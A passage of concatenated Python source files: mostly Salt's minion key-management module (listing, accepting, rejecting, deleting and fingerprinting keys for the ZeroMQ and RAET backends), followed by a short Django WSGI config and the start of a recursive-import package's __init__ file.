            if not os.path.isdir(self.opts['signature_path']):
                print('target directory {0} does not exist'
                      ''.format(self.opts['signature_path']))
        else:
            # Fall back to writing the signature into the pki directory.
            self.opts['signature_path'] = self.opts['pki_dir']

        sign_path = self.opts['signature_path'] + '/' + self.opts['master_pubkey_signature']

        self.key.gen_signature(self.privkey,
                               self.pubkey,
                               sign_path)

    def run(self):
        '''
        Run the logic for saltkey
        '''
        # gen_keys / gen_signature are terminal operations; everything else
        # dispatches to the matching list/accept/reject/delete/finger method.
        if self.opts['gen_keys']:
            self.key.gen_keys()
            return
        elif self.opts['gen_signature']:
            self.prep_signature()
            return
        if self.opts['list']:
            self.list_status(self.opts['list'])
        elif self.opts['list_all']:
            self.list_all()
        elif self.opts['print']:
            self.print_key(self.opts['print'])
        elif self.opts['print_all']:
            self.print_all()
        elif self.opts['accept']:
            self.accept(
                self.opts['accept'],
                include_rejected=self.opts['include_all']
            )
        elif self.opts['accept_all']:
            self.accept_all(include_rejected=self.opts['include_all'])
        elif self.opts['reject']:
            self.reject(
                self.opts['reject'],
                include_accepted=self.opts['include_all']
            )
        elif self.opts['reject_all']:
            self.reject_all(include_accepted=self.opts['include_all'])
        elif self.opts['delete']:
            self.delete(self.opts['delete'])
        elif self.opts['delete_all']:
            self.delete_all()
        elif self.opts['finger']:
            self.finger(self.opts['finger'])
        elif self.opts['finger_all']:
            self.finger_all()
        else:
            # No action requested: default to listing every key.
            self.list_all()


class MultiKeyCLI(KeyCLI):
    '''
    Manage multiple key backends from the CLI
    '''
    def __init__(self, opts):
        opts['__multi_key'] = True
        super(MultiKeyCLI, self).__init__(opts)
        # Remove the key attribute set in KeyCLI.__init__
        delattr(self, 'key')
        # Build one KeyCLI per transport, each with its own copy of opts.
        zopts = copy.copy(opts)
        ropts = copy.copy(opts)
        self.keys = {}
        zopts['transport'] = 'zeromq'
        self.keys['ZMQ Keys'] = KeyCLI(zopts)
        ropts['transport'] = 'raet'
        self.keys['RAET Keys'] = KeyCLI(ropts)

    def _call_all(self, fun, *args):
        '''
        Call the given function on all backend keys
        '''
        for kback in self.keys:
            # Print the backend label before its output.
            print(kback)
            getattr(self.keys[kback], fun)(*args)

    # Each public method below fans out to every backend via _call_all.
    def list_status(self, status):
        self._call_all('list_status', status)

    def list_all(self):
        self._call_all('list_all')

    def accept(self, match, include_rejected=False):
        self._call_all('accept', match, include_rejected)

    def accept_all(self, include_rejected=False):
        self._call_all('accept_all', include_rejected)

    def delete(self, match):
        self._call_all('delete', match)

    def delete_all(self):
        self._call_all('delete_all')

    def reject(self, match, include_accepted=False):
        self._call_all('reject', match, include_accepted)

    def reject_all(self, include_accepted=False):
        self._call_all('reject_all', include_accepted)

    def print_key(self, match):
        self._call_all('print_key', match)

    def print_all(self):
        self._call_all('print_all')

    def finger(self, match):
        self._call_all('finger', match)

    def finger_all(self):
        self._call_all('finger_all')

    def prep_signature(self):
        self._call_all('prep_signature')


class Key(object):
    '''
    The object that encapsulates saltkey actions

    Operates on the key directories under ``opts['pki_dir']`` and fires
    events on the salt event bus when keys are accepted, rejected or
    deleted.
    '''
    # Sub-directories of ``pki_dir`` holding minion keys in each
    # acceptance state.
    ACC = 'minions'
    PEND = 'minions_pre'
    REJ = 'minions_rejected'
    DEN = 'minions_denied'

    def __init__(self, opts):
        '''
        :param opts: salt configuration dict; must carry a valid ``__role``
            (application kind) plus ``sock_dir`` and ``transport``
        :raises ValueError: if ``__role`` is not a recognized application kind
        '''
        self.opts = opts
        kind = self.opts.get('__role', '')  # application kind
        if kind not in kinds.APPL_KINDS:
            emsg = ("Invalid application kind = '{0}'.".format(kind))
            log.error(emsg + '\n')
            raise ValueError(emsg)
        # Event bus used to publish accept/reject/delete notifications
        self.event = salt.utils.event.get_event(
                kind,
                opts['sock_dir'],
                opts['transport'],
                opts=opts,
                listen=False)

    def _check_minions_directories(self):
        '''
        Return the minion keys directory paths as a 4-tuple:
        (accepted, pre, rejected, denied)
        '''
        minions_accepted = os.path.join(self.opts['pki_dir'], self.ACC)
        minions_pre = os.path.join(self.opts['pki_dir'], self.PEND)
        minions_rejected = os.path.join(self.opts['pki_dir'],
                                        self.REJ)

        minions_denied = os.path.join(self.opts['pki_dir'],
                                        self.DEN)
        return minions_accepted, minions_pre, minions_rejected, minions_denied

    def gen_keys(self):
        '''
        Generate minion RSA public keypair

        Destination directory, key name and key size come from the
        ``gen_keys_dir``, ``gen_keys`` and ``keysize`` options.
        '''
        salt.crypt.gen_keys(
                self.opts['gen_keys_dir'],
                self.opts['gen_keys'],
                self.opts['keysize'])
        return

    def gen_signature(self, privkey, pubkey, sig_path):
        '''
        Generate master public-key-signature

        :param privkey: path to the private key used for signing
        :param pubkey: path to the public key to sign
        :param sig_path: path the signature file is written to
        '''
        return salt.crypt.gen_signature(privkey,
                                        pubkey,
                                        sig_path)

    def check_minion_cache(self, preserve_minions=None):
        '''
        Check the minion cache to make sure that old minion data is cleared

        Optionally, pass in a list of minions which should have their caches
        preserved. To preserve all caches, set __opts__['preserve_minion_cache']
        '''
        if preserve_minions is None:
            preserve_minions = []
        m_cache = os.path.join(self.opts['cachedir'], self.ACC)
        if not os.path.isdir(m_cache):
            return
        keys = self.list_keys()
        minions = []
        for key, val in six.iteritems(keys):
            minions.extend(val)
        # Prune cache dirs of minions that no longer have a key, unless the
        # preserve option is set AND an explicit preserve list was given;
        # minions named in ``preserve_minions`` are always skipped below.
        if not self.opts.get('preserve_minion_cache', False) or not preserve_minions:
            for minion in os.listdir(m_cache):
                if minion not in minions and minion not in preserve_minions:
                    shutil.rmtree(os.path.join(m_cache, minion))

    def check_master(self):
        '''
        Log if the master is not running

        :rtype: bool
        :return: Whether or not the master is running
        '''
        # Presence of the publish socket file is used as the liveness probe.
        if not os.path.exists(
                os.path.join(
                    self.opts['sock_dir'],
                    'publish_pull.ipc'
                    )
                ):
            return False
        return True

    def name_match(self, match, full=False):
        '''
        Accept a glob (or comma-separated list of globs) to match key names
        against and return the matching keys grouped by status.

        :param full: also match against local keys, not just managed ones
        '''
        if full:
            matches = self.all_keys()
        else:
            matches = self.list_keys()
        ret = {}
        # A comma-separated string is treated as a list of globs.
        if ',' in match and isinstance(match, str):
            match = match.split(',')
        for status, keys in six.iteritems(matches):
            for key in salt.utils.isorted(keys):
                if isinstance(match, list):
                    for match_item in match:
                        if fnmatch.fnmatch(key, match_item):
                            if status not in ret:
                                ret[status] = []
                            ret[status].append(key)
                else:
                    if fnmatch.fnmatch(key, match):
                        if status not in ret:
                            ret[status] = []
                        ret[status].append(key)
        return ret

    def dict_match(self, match_dict):
        '''
        Accept a dictionary of keys and return the current state of the
        specified keys
        '''
        ret = {}
        cur_keys = self.list_keys()
        for status, keys in six.iteritems(match_dict):
            for key in salt.utils.isorted(keys):
                # A key may have moved status since the match was gathered;
                # report wherever it currently lives.
                for keydir in (self.ACC, self.PEND, self.REJ, self.DEN):
                    if keydir and fnmatch.filter(cur_keys.get(keydir, []), key):
                        ret.setdefault(keydir, []).append(key)
        return ret

    def local_keys(self):
        '''
        Return a dict of local keys

        Only ``.pub``/``.pem`` files directly under ``pki_dir`` are listed.
        '''
        ret = {'local': []}
        for fn_ in salt.utils.isorted(os.listdir(self.opts['pki_dir'])):
            if fn_.endswith('.pub') or fn_.endswith('.pem'):
                path = os.path.join(self.opts['pki_dir'], fn_)
                if os.path.isfile(path):
                    ret['local'].append(fn_)
        return ret

    def list_keys(self):
        '''
        Return a dict of managed keys and what the key status are
        '''

        key_dirs = []

        # We have to differentiate between RaetKey._check_minions_directories
        # and Zeromq-Keys. Raet-Keys only have three states while ZeroMQ-keys
        # have an additional 'denied' state.
        # NOTE(review): both branches currently make the identical call; the
        # split only documents intent and could be collapsed — confirm.
        if self.opts['transport'] in ('zeromq', 'tcp'):
            key_dirs = self._check_minions_directories()
        else:
            key_dirs = self._check_minions_directories()

        ret = {}

        for dir_ in key_dirs:
            ret[os.path.basename(dir_)] = []
            try:
                # Dotfiles are skipped; only regular files count as keys.
                for fn_ in salt.utils.isorted(os.listdir(dir_)):
                    if not fn_.startswith('.'):
                        if os.path.isfile(os.path.join(dir_, fn_)):
                            ret[os.path.basename(dir_)].append(fn_)
            except (OSError, IOError):
                # key dir kind is not created yet, just skip
                continue
        return ret

    def all_keys(self):
        '''
        Merge managed keys with local keys
        '''
        keys = self.list_keys()
        keys.update(self.local_keys())
        return keys

    def list_status(self, match):
        '''
        Return a dict of managed keys under a named status

        :param match: status selector; matched by prefix: ``acc``, ``pre``
            (or ``un``), ``rej``, ``den``, or ``all``
        '''
        acc, pre, rej, den = self._check_minions_directories()
        ret = {}
        if match.startswith('acc'):
            ret[os.path.basename(acc)] = []
            for fn_ in salt.utils.isorted(os.listdir(acc)):
                if not fn_.startswith('.'):
                    if os.path.isfile(os.path.join(acc, fn_)):
                        ret[os.path.basename(acc)].append(fn_)
        elif match.startswith('pre') or match.startswith('un'):
            ret[os.path.basename(pre)] = []
            for fn_ in salt.utils.isorted(os.listdir(pre)):
                if not fn_.startswith('.'):
                    if os.path.isfile(os.path.join(pre, fn_)):
                        ret[os.path.basename(pre)].append(fn_)
        elif match.startswith('rej'):
            ret[os.path.basename(rej)] = []
            for fn_ in salt.utils.isorted(os.listdir(rej)):
                if not fn_.startswith('.'):
                    if os.path.isfile(os.path.join(rej, fn_)):
                        ret[os.path.basename(rej)].append(fn_)
        elif match.startswith('den'):
            ret[os.path.basename(den)] = []
            for fn_ in salt.utils.isorted(os.listdir(den)):
                if not fn_.startswith('.'):
                    if os.path.isfile(os.path.join(den, fn_)):
                        ret[os.path.basename(den)].append(fn_)
        elif match.startswith('all'):
            return self.all_keys()
        return ret

    def key_str(self, match):
        '''
        Return the specified public key or keys based on a glob

        :return: nested dict of ``{status: {key_name: key_contents}}``
        '''
        ret = {}
        for status, keys in six.iteritems(self.name_match(match)):
            ret[status] = {}
            for key in salt.utils.isorted(keys):
                path = os.path.join(self.opts['pki_dir'], status, key)
                with salt.utils.fopen(path, 'r') as fp_:
                    ret[status][key] = fp_.read()
        return ret

    def key_str_all(self):
        '''
        Return all managed key strings

        :return: nested dict of ``{status: {key_name: key_contents}}``
        '''
        ret = {}
        for status, keys in six.iteritems(self.list_keys()):
            ret[status] = {}
            for key in salt.utils.isorted(keys):
                path = os.path.join(self.opts['pki_dir'], status, key)
                with salt.utils.fopen(path, 'r') as fp_:
                    ret[status][key] = fp_.read()
        return ret

    def accept(self, match=None, match_dict=None, include_rejected=False):
        '''
        Accept public keys. If "match" is passed, it is evaluated as a glob.
        Pre-gathered matches can also be passed via "match_dict".

        :param include_rejected: also move matching keys out of the
            rejected directory
        :return: the resulting state of the matched keys
        '''
        if match is not None:
            matches = self.name_match(match)
        elif match_dict is not None and isinstance(match_dict, dict):
            matches = match_dict
        else:
            matches = {}
        keydirs = [self.PEND]
        if include_rejected:
            keydirs.append(self.REJ)
        for keydir in keydirs:
            for key in matches.get(keydir, []):
                try:
                    # Moving the key file is the acceptance; fire an event
                    # for each key moved. Failures are best-effort.
                    shutil.move(
                            os.path.join(
                                self.opts['pki_dir'],
                                keydir,
                                key),
                            os.path.join(
                                self.opts['pki_dir'],
                                self.ACC,
                                key)
                            )
                    eload = {'result': True,
                             'act': 'accept',
                             'id': key}
                    self.event.fire_event(eload, tagify(prefix='key'))
                except (IOError, OSError):
                    pass
        return (
            self.name_match(match) if match is not None
            else self.dict_match(matches)
        )

    def accept_all(self):
        '''
        Accept all keys in pre

        :return: the full key listing after the moves
        '''
        keys = self.list_keys()
        for key in keys[self.PEND]:
            try:
                shutil.move(
                        os.path.join(
                            self.opts['pki_dir'],
                            self.PEND,
                            key),
                        os.path.join(
                            self.opts['pki_dir'],
                            self.ACC,
                            key)
                        )
                eload = {'result': True,
                         'act': 'accept',
                         'id': key}
                self.event.fire_event(eload, tagify(prefix='key'))
            except (IOError, OSError):
                pass
        return self.list_keys()

    def delete_key(self, match=None, match_dict=None, preserve_minions=False):
        '''
        Delete public keys. If "match" is passed, it is evaluated as a glob.
        Pre-gathered matches can also be passed via "match_dict".

        To preserve the master caches of minions who are matched, set preserve_minions
        '''
        if match is not None:
            matches = self.name_match(match)
        elif match_dict is not None and isinstance(match_dict, dict):
            matches = match_dict
        else:
            matches = {}
        for status, keys in six.iteritems(matches):
            for key in keys:
                try:
                    os.remove(os.path.join(self.opts['pki_dir'], status, key))
                    eload = {'result': True,
                             'act': 'delete',
                             'id': key}
                    self.event.fire_event(eload, tagify(prefix='key'))
                except (OSError, IOError):
                    pass
        self.check_minion_cache(preserve_minions=matches.get('minions', []))
        # Rotating the AES key forces remaining minions to re-auth.
        if self.opts.get('rotate_aes_key'):
            salt.crypt.dropfile(self.opts['cachedir'], self.opts['user'])
        return (
            self.name_match(match) if match is not None
            else self.dict_match(matches)
        )

    def delete_all(self):
        '''
        Delete all keys

        :return: the (now mostly empty) key listing
        '''
        for status, keys in six.iteritems(self.list_keys()):
            for key in keys:
                try:
                    os.remove(os.path.join(self.opts['pki_dir'], status, key))
                    eload = {'result': True,
                             'act': 'delete',
                             'id': key}
                    self.event.fire_event(eload, tagify(prefix='key'))
                except (OSError, IOError):
                    pass
        self.check_minion_cache()
        if self.opts.get('rotate_aes_key'):
            salt.crypt.dropfile(self.opts['cachedir'], self.opts['user'])
        return self.list_keys()

    def reject(self, match=None, match_dict=None, include_accepted=False):
        '''
        Reject public keys. If "match" is passed, it is evaluated as a glob.
        Pre-gathered matches can also be passed via "match_dict".

        :param include_accepted: also move matching keys out of the
            accepted directory
        :return: the resulting state of the matched keys
        '''
        if match is not None:
            matches = self.name_match(match)
        elif match_dict is not None and isinstance(match_dict, dict):
            matches = match_dict
        else:
            matches = {}
        keydirs = [self.PEND]
        if include_accepted:
            keydirs.append(self.ACC)
        for keydir in keydirs:
            for key in matches.get(keydir, []):
                try:
                    shutil.move(
                            os.path.join(
                                self.opts['pki_dir'],
                                keydir,
                                key),
                            os.path.join(
                                self.opts['pki_dir'],
                                self.REJ,
                                key)
                            )
                    eload = {'result': True,
                            'act': 'reject',
                            'id': key}
                    self.event.fire_event(eload, tagify(prefix='key'))
                except (IOError, OSError):
                    pass
        self.check_minion_cache()
        if self.opts.get('rotate_aes_key'):
            salt.crypt.dropfile(self.opts['cachedir'], self.opts['user'])
        return (
            self.name_match(match) if match is not None
            else self.dict_match(matches)
        )

    def reject_all(self):
        '''
        Reject all keys in pre

        :return: the full key listing after the moves
        '''
        keys = self.list_keys()
        for key in keys[self.PEND]:
            try:
                shutil.move(
                        os.path.join(
                            self.opts['pki_dir'],
                            self.PEND,
                            key),
                        os.path.join(
                            self.opts['pki_dir'],
                            self.REJ,
                            key)
                        )
                eload = {'result': True,
                         'act': 'reject',
                         'id': key}
                self.event.fire_event(eload, tagify(prefix='key'))
            except (IOError, OSError):
                pass
        self.check_minion_cache()
        if self.opts.get('rotate_aes_key'):
            salt.crypt.dropfile(self.opts['cachedir'], self.opts['user'])
        return self.list_keys()

    def finger(self, match):
        '''
        Return the fingerprint for a specified key

        :return: nested dict of ``{status: {key_name: fingerprint}}``
        '''
        matches = self.name_match(match, True)
        ret = {}
        for status, keys in six.iteritems(matches):
            ret[status] = {}
            for key in keys:
                # Local keys live directly in pki_dir; managed keys are in
                # their per-status sub-directory.
                if status == 'local':
                    path = os.path.join(self.opts['pki_dir'], key)
                else:
                    path = os.path.join(self.opts['pki_dir'], status, key)
                ret[status][key] = salt.utils.pem_finger(path, sum_type=self.opts['hash_type'])
        return ret

    def finger_all(self):
        '''
        Return fingerprints for all keys

        :return: nested dict of ``{status: {key_name: fingerprint}}``
        '''
        ret = {}
        for status, keys in six.iteritems(self.list_keys()):
            ret[status] = {}
            for key in keys:
                if status == 'local':
                    path = os.path.join(self.opts['pki_dir'], key)
                else:
                    path = os.path.join(self.opts['pki_dir'], status, key)
                ret[status][key] = salt.utils.pem_finger(path, sum_type=self.opts['hash_type'])
        return ret


class RaetKey(Key):
    '''
    Manage keys from the raet backend

    Unlike the ZeroMQ backend, raet keys are serialized key-data records
    (pub/verify curve keys) rather than PEM files, and there is no
    'denied' state.
    '''
    ACC = 'accepted'
    PEND = 'pending'
    REJ = 'rejected'
    DEN = None  # raet has no 'denied' state

    def __init__(self, opts):
        Key.__init__(self, opts)
        # auto_key implements the autosign/autoreject policy checks
        self.auto_key = salt.daemons.masterapi.AutoKey(self.opts)
        # serial (de)serializes the key-data records stored on disk
        self.serial = salt.payload.Serial(self.opts)

    def _check_minions_directories(self):
        '''
        Return the minion keys directory paths as a 3-tuple:
        (accepted, pre, rejected) — note: no 'denied' directory for raet.
        '''
        accepted = os.path.join(self.opts['pki_dir'], self.ACC)
        pre = os.path.join(self.opts['pki_dir'], self.PEND)
        rejected = os.path.join(self.opts['pki_dir'], self.REJ)
        return accepted, pre, rejected

    def check_minion_cache(self, preserve_minions=False):
        '''
        Check the minion cache to make sure that old minion data is cleared

        Clears both the master's minion data cache and the raet road cache
        of estates whose keys are no longer managed.

        NOTE(review): ``preserve_minions`` is accepted for interface parity
        with Key.check_minion_cache but is never consulted below — confirm
        whether that is intended.
        '''
        keys = self.list_keys()
        minions = []
        for key, val in six.iteritems(keys):
            minions.extend(val)

        m_cache = os.path.join(self.opts['cachedir'], 'minions')
        if os.path.isdir(m_cache):
            for minion in os.listdir(m_cache):
                if minion not in minions:
                    shutil.rmtree(os.path.join(m_cache, minion))

        kind = self.opts.get('__role', '')  # application kind
        if kind not in kinds.APPL_KINDS:
            emsg = ("Invalid application kind = '{0}'.".format(kind))
            log.error(emsg + '\n')
            raise ValueError(emsg)
        role = self.opts.get('id', '')
        if not role:
            emsg = ("Invalid id.")
            log.error(emsg + "\n")
            raise ValueError(emsg)

        # Road cache dir is keyed on "<id>_<kind>"
        name = "{0}_{1}".format(role, kind)
        road_cache = os.path.join(self.opts['cachedir'],
                                  'raet',
                                  name,
                                  'remote')
        if os.path.isdir(road_cache):
            for road in os.listdir(road_cache):
                root, ext = os.path.splitext(road)
                if ext not in ['.json', '.msgpack']:
                    continue
                # Road files are named 'estate.<name>.<ext>'
                prefix, sep, name = root.partition('.')
                if not name or prefix != 'estate':
                    continue
                path = os.path.join(road_cache, road)
                with salt.utils.fopen(path, 'rb') as fp_:
                    if ext == '.json':
                        data = json.load(fp_)
                    elif ext == '.msgpack':
                        data = msgpack.load(fp_)
                    # Drop road entries for roles without a managed key
                    if data['role'] not in minions:
                        os.remove(path)

    def gen_keys(self):
        '''
        Use libnacl to generate and safely save a private key
        '''
        # NOTE(review): only ``libnacl.public`` is imported here yet
        # ``libnacl.dual`` is used below — confirm libnacl.dual is importable
        # as a side effect of this import.
        import libnacl.public
        d_key = libnacl.dual.DualSecret()
        path = '{0}.key'.format(os.path.join(
            self.opts['gen_keys_dir'],
            self.opts['gen_keys']))
        d_key.save(path, 'msgpack')

    def check_master(self):
        '''
        Log if the master is not running
        NOT YET IMPLEMENTED
        '''
        # Always reports running until a real check is implemented.
        return True

    def local_keys(self):
        '''
        Return a dict of local keys

        For raet only the single ``local.key`` file is considered.
        '''
        ret = {'local': []}
        fn_ = os.path.join(self.opts['pki_dir'], 'local.key')
        if os.path.isfile(fn_):
            ret['local'].append(fn_)
        return ret

    def status(self, minion_id, pub, verify):
        '''
        Accepts the minion id, device id, curve public and verify keys.
        If the key is not present, put it in pending and return "pending",
        If the key has been accepted return "accepted"
        if the key should be rejected, return "rejected"

        :param minion_id: id of the minion presenting the keys
        :param pub: the minion's curve public key
        :param verify: the minion's verify key
        :return: one of self.ACC, self.PEND or self.REJ
        '''
        acc, pre, rej = self._check_minions_directories()  # pylint: disable=W0632
        acc_path = os.path.join(acc, minion_id)
        pre_path = os.path.join(pre, minion_id)
        rej_path = os.path.join(rej, minion_id)
        # open mode is turned on, force accept the key
        keydata = {
                'minion_id': minion_id,
                'pub': pub,
                'verify': verify}
        if self.opts['open_mode']:  # always accept and overwrite
            with salt.utils.fopen(acc_path, 'w+b') as fp_:
                fp_.write(self.serial.dumps(keydata))
                return self.ACC
        if os.path.isfile(rej_path):
            log.debug("Rejection Reason: Keys already rejected.\n")
            return self.REJ
        elif os.path.isfile(acc_path):
            # The minion id has been accepted, verify the key strings
            with salt.utils.fopen(acc_path, 'rb') as fp_:
                keydata = self.serial.loads(fp_.read())
            if keydata['pub'] == pub and keydata['verify'] == verify:
                return self.ACC
            else:
                # Presented keys differ from the accepted record
                log.debug("Rejection Reason: Keys not match prior accepted.\n")
                return self.REJ
        elif os.path.isfile(pre_path):
            # Key is pending: re-check the autosign/autoreject policies
            auto_reject = self.auto_key.check_autoreject(minion_id)
            auto_sign = self.auto_key.check_autosign(minion_id)
            with salt.utils.fopen(pre_path, 'rb') as fp_:
                keydata = self.serial.loads(fp_.read())
            if keydata['pub'] == pub and keydata['verify'] == verify:
                if auto_reject:
                    self.reject(minion_id)
                    log.debug("Rejection Reason: Auto reject pended.\n")
                    return self.REJ
                elif auto_sign:
                    self.accept(minion_id)
                    return self.ACC
                return self.PEND
            else:
                log.debug("Rejection Reason: Keys not match prior pended.\n")
                return self.REJ
        # This is a new key, evaluate auto accept/reject files and place
        # accordingly
        auto_reject = self.auto_key.check_autoreject(minion_id)
        auto_sign = self.auto_key.check_autosign(minion_id)
        if self.opts['auto_accept']:
            w_path = acc_path
            ret = self.ACC
        elif auto_sign:
            w_path = acc_path
            ret = self.ACC
        elif auto_reject:
            w_path = rej_path
            log.debug("Rejection Reason: Auto reject new.\n")
            ret = self.REJ
        else:
            w_path = pre_path
            ret = self.PEND
        with salt.utils.fopen(w_path, 'w+b') as fp_:
            fp_.write(self.serial.dumps(keydata))
            return ret

    def _get_key_str(self, minion_id, status):
        '''
        Return the key string in the form of:

        pub: <pub>
        verify: <verify>
        '''
        path = os.path.join(self.opts['pki_dir'], status, minion_id)
        with salt.utils.fopen(path, 'r') as fp_:
            keydata = self.serial.loads(fp_.read())
            return 'pub: {0}\nverify: {1}'.format(
                    keydata['pub'],
                    keydata['verify'])

    def _get_key_finger(self, path):
        '''
        Return a sha256 fingerprint for the key

        :param path: path of the serialized key-data record on disk
        '''
        with salt.utils.fopen(path, 'r') as fp_:
            keydata = self.serial.loads(fp_.read())
            key = 'pub: {0}\nverify: {1}'.format(
                    keydata['pub'],
                    keydata['verify'])
        # NOTE(review): sha256() is fed a str — assumes PY2 where str is
        # bytes; confirm behavior under PY3.
        return hashlib.sha256(key).hexdigest()

    def key_str(self, match):
        '''
        Return the specified public key or keys based on a glob

        :return: nested dict of ``{status: {key_name: key_string}}``
        '''
        ret = {}
        for status, keys in six.iteritems(self.name_match(match)):
            ret[status] = {}
            for key in salt.utils.isorted(keys):
                ret[status][key] = self._get_key_str(key, status)
        return ret

    def key_str_all(self):
        '''
        Return all managed key strings

        :return: nested dict of ``{status: {key_name: key_string}}``
        '''
        ret = {}
        for status, keys in six.iteritems(self.list_keys()):
            ret[status] = {}
            for key in salt.utils.isorted(keys):
                ret[status][key] = self._get_key_str(key, status)
        return ret

    def accept(self, match=None, match_dict=None, include_rejected=False):
        '''
        Accept public keys. If "match" is passed, it is evaluated as a glob.
        Pre-gathered matches can also be passed via "match_dict".

        Unlike the ZeroMQ backend, no events are fired per accepted key.

        :param include_rejected: also move matching keys out of rejected
        :return: the resulting state of the matched keys
        '''
        if match is not None:
            matches = self.name_match(match)
        elif match_dict is not None and isinstance(match_dict, dict):
            matches = match_dict
        else:
            matches = {}
        keydirs = [self.PEND]
        if include_rejected:
            keydirs.append(self.REJ)
        for keydir in keydirs:
            for key in matches.get(keydir, []):
                try:
                    shutil.move(
                            os.path.join(
                                self.opts['pki_dir'],
                                keydir,
                                key),
                            os.path.join(
                                self.opts['pki_dir'],
                                self.ACC,
                                key)
                            )
                except (IOError, OSError):
                    pass
        return (
            self.name_match(match) if match is not None
            else self.dict_match(matches)
        )

    def accept_all(self):
        '''
        Accept all keys in pre

        :return: the full key listing after the moves
        '''
        keys = self.list_keys()
        for key in keys[self.PEND]:
            try:
                shutil.move(
                        os.path.join(
                            self.opts['pki_dir'],
                            self.PEND,
                            key),
                        os.path.join(
                            self.opts['pki_dir'],
                            self.ACC,
                            key)
                        )
            except (IOError, OSError):
                pass
        return self.list_keys()

    def delete_key(self, match=None, match_dict=None, preserve_minions=False):
        '''
        Delete public keys. If "match" is passed, it is evaluated as a glob.
        Pre-gathered matches can also be passed via "match_dict".
        '''
        if match is not None:
            matches = self.name_match(match)
        elif match_dict is not None and isinstance(match_dict, dict):
            matches = match_dict
        else:
            matches = {}
        for status, keys in six.iteritems(matches):
            for key in keys:
                try:
                    os.remove(os.path.join(self.opts['pki_dir'], status, key))
                except (OSError, IOError):
                    pass
        self.check_minion_cache(preserve_minions=matches.get('minions', []))
        return (
            self.name_match(match) if match is not None
            else self.dict_match(matches)
        )

    def delete_all(self):
        '''
        Delete all keys

        :return: the (now mostly empty) key listing
        '''
        for status, keys in six.iteritems(self.list_keys()):
            for key in keys:
                try:
                    os.remove(os.path.join(self.opts['pki_dir'], status, key))
                except (OSError, IOError):
                    pass
        self.check_minion_cache()
        return self.list_keys()

    def reject(self, match=None, match_dict=None, include_accepted=False):
        '''
        Reject public keys. If "match" is passed, it is evaluated as a glob.
        Pre-gathered matches can also be passed via "match_dict".

        :param include_accepted: also move matching keys out of accepted
        :return: the resulting state of the matched keys
        '''
        if match is not None:
            matches = self.name_match(match)
        elif match_dict is not None and isinstance(match_dict, dict):
            matches = match_dict
        else:
            matches = {}
        keydirs = [self.PEND]
        if include_accepted:
            keydirs.append(self.ACC)
        for keydir in keydirs:
            for key in matches.get(keydir, []):
                try:
                    shutil.move(
                            os.path.join(
                                self.opts['pki_dir'],
                                keydir,
                                key),
                            os.path.join(
                                self.opts['pki_dir'],
                                self.REJ,
                                key)
                            )
                except (IOError, OSError):
                    pass
        self.check_minion_cache()
        return (
            self.name_match(match) if match is not None
            else self.dict_match(matches)
        )

    def reject_all(self):
        '''
        Reject all keys in pre

        :return: the full key listing after the moves
        '''
        keys = self.list_keys()
        for key in keys[self.PEND]:
            try:
                shutil.move(
                        os.path.join(
                            self.opts['pki_dir'],
                            self.PEND,
                            key),
                        os.path.join(
                            self.opts['pki_dir'],
                            self.REJ,
                            key)
                        )
            except (IOError, OSError):
                pass
        self.check_minion_cache()
        return self.list_keys()

    def finger(self, match):
        '''
        Return the fingerprint for a specified key

        :return: nested dict of ``{status: {key_name: fingerprint}}``
        '''
        matches = self.name_match(match, True)
        ret = {}
        for status, keys in six.iteritems(matches):
            ret[status] = {}
            for key in keys:
                # Local keys live directly in pki_dir; managed keys are in
                # their per-status sub-directory.
                if status == 'local':
                    path = os.path.join(self.opts['pki_dir'], key)
                else:
                    path = os.path.join(self.opts['pki_dir'], status, key)
                ret[status][key] = self._get_key_finger(path)
        return ret

    def finger_all(self):
        '''
        Return fingerprints for all keys

        :return: nested dict of ``{status: {key_name: fingerprint}}``
        '''
        ret = {}
        for status, keys in six.iteritems(self.list_keys()):
            ret[status] = {}
            for key in keys:
                if status == 'local':
                    path = os.path.join(self.opts['pki_dir'], key)
                else:
                    path = os.path.join(self.opts['pki_dir'], status, key)
                ret[status][key] = self._get_key_finger(path)
        return ret

    def read_all_remote(self):
        '''
        Return a dict of all remote key data

        Each record is augmented with an ``acceptance`` entry naming the
        status directory it was read from.
        '''
        data = {}
        for status, mids in six.iteritems(self.list_keys()):
            for mid in mids:
                keydata = self.read_remote(mid, status)
                if keydata:
                    keydata['acceptance'] = status
                    data[mid] = keydata

        return data

    def read_remote(self, minion_id, status=ACC):
        '''
        Read in a remote key of status

        :return: the deserialized key-data record, or {} if missing
        '''
        path = os.path.join(self.opts['pki_dir'], status, minion_id)
        if not os.path.isfile(path):
            return {}
        with salt.utils.fopen(path, 'rb') as fp_:
            return self.serial.loads(fp_.read())

    def read_local(self):
        '''
        Read in the local private keys, return an empty dict if the keys do not
        exist
        '''
        path = os.path.join(self.opts['pki_dir'], 'local.key')
        if not os.path.isfile(path):
            return {}
        with salt.utils.fopen(path, 'rb') as fp_:
            return self.serial.loads(fp_.read())

    def write_local(self, priv, sign):
        '''
        Write the private key and the signing key to a file on disk

        The file is created with a restrictive umask (191 == 0o277) and
        left owner-read-only afterwards.
        '''
        keydata = {'priv': priv,
                   'sign': sign}
        path = os.path.join(self.opts['pki_dir'], 'local.key')
        c_umask = os.umask(191)
        if os.path.exists(path):
            #mode = os.stat(path).st_mode
            # Existing file must be made writable before rewriting
            os.chmod(path, stat.S_IWUSR | stat.S_IRUSR)
        with salt.utils.fopen(path, 'w+') as fp_:
            fp_.write(self.serial.dumps(keydata))
            os.chmod(path, stat.S_IRUSR)
        os.umask(c_umask)

    def delete_local(self):
        '''
        Delete the local private key file
        '''
        path = os.path.join(self.opts['pki_dir'], 'local.key')
        if os.path.isfile(path):
            os.remove(path)

    def delete_pki_dir(self):
        '''
        Delete the private key directory
        '''
        path = self.opts['pki_dir']
        if os.path.exists(path):
            shutil.rmtree(path)

"""
WSGI config for brp project.

It exposes the WSGI callable as a module-level variable named ``application``.

For more information on this file, see
https://docs.djangoproject.com/en/1.9/howto/deployment/wsgi/
"""

import os

from dj_static import Cling
from django.core.wsgi import get_wsgi_application

os.environ.setdefault("DJANGO_SETTINGS_MODULE", "brp.settings")
os.environ.setdefault('DJANGO_CONFIGURATION', 'Dev')

application = Cling(get_wsgi_application())

"""
recursely
"""
__version__ = "0.1"
__description__ = "Recursive importer for Python submodules"
__author__ = "Karol Kuczmarski"
__license__ = "Simplified BSD"


import sys

from recursely._compat import IS_PY3
from recursely.importer import RecursiveImporter
from recursely.utils import SentinelList


__all__ = ['install']


def install(retroactive=True):
    """Install the recursive import hook in ``sys.meta_path``,
    enabling the use of ``__recursive__`` directive.

    :param retroactive: Whether the hook should be retroactively applied
